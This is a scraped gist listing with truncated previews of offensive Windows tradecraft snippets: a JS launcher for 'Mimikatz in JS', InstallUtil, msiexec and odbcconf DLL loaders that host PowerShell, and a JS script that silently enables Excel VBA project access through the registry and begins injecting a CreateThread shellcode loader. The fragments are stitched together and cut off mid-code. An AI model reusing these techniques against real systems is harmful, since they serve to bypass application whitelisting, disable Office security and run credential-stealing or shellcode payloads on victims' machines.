Skip to content

Instantly share code, notes, and snippets.

sammbertram / dynwrap.js
Created June 3, 2017 09:55
RegistrationFree DynamicWrapperX
var actCtx = new ActiveXObject( "Microsoft.Windows.ActCtx" );
actCtx.Manifest = "C:\\Tools\\COM\\dynwrap.test.manifest";
var DX = actCtx.CreateObject("DynamicWrapperX");
DX.Register("user32.dll", "MessageBoxW", "i=hwwu", "r=l"); // Register a dll function.
res = DX.MessageBoxW(0, "Hello, world!", "Test", 4); // Call the function.
catch(e){ WScript.Echo("Fail");}
using System;
using System.IO;
using System.Net;
using System.Text;
using System.IO.Compression;
using System.Collections.Generic;
using System.Configuration.Install;
using System.Runtime.InteropServices;
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
sammbertram / WDAG_CI_Policy.xml
Created November 10, 2017 15:06 — forked from mattifestation/WDAG_CI_Policy.xml
Recovered Windows Defender Application Guard Hyper-V Container Code Integrity Policy
<?xml version="1.0"?>
<SiPolicy xmlns:xsd="" xmlns:xsi="" xmlns="urn:schemas-microsoft-com:sipolicy">
sammbertram / katz.js
Created June 5, 2017 10:56
Mimikatz in JS - Courtesy of James Forshaw - ;-)
This file has been truncated, but you can view the full file.
var serialized_obj = [
REGSVR odbcconf.dll
// msiexec /z "full path to msiexec.dll"
using System;
using System.Runtime.InteropServices;
using RGiesecke.DllExport;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Text;
// msiexec /z "full path to msiexec.dll"
using System;
using System.Runtime.InteropServices;
using RGiesecke.DllExport;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Text;
Windows Registry Editor Version 5.00
@="C:\\Users\\Administrator\\Documents\\Visual Studio 2015\\Projects\\ClassLibrary2\\ClassLibrary2\\bin\\x86\\Debug\\ClassLibrary2.dll"
sammbertram / example.js
Created June 3, 2017 09:58
Shellcode via Office via . JS
var objExcel = new ActiveXObject("Excel.Application");
objExcel.Visible = false;
var WshShell = new ActiveXObject("WScript.Shell");
var Application_Version = objExcel.Version;//Auto-Detect Version
var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM";
WshShell.RegWrite(strRegPath, 1, "REG_DWORD");
var objWorkbook = objExcel.Workbooks.Add();
var xlmodule = objWorkbook.VBProject.VBComponents.Add(1);
// Sample Shell Code Execution Documented Here:
var strCode = 'Private Declare Function CreateThread Lib "kernel32" (ByVal Npdrhkbff As Long, ByVal Drcunuy As Long, ByVal Ache As Long, Wiquwzp As Long, ByVal Ltdplqkqj As Long, Xsawbea As Long) As Long\n';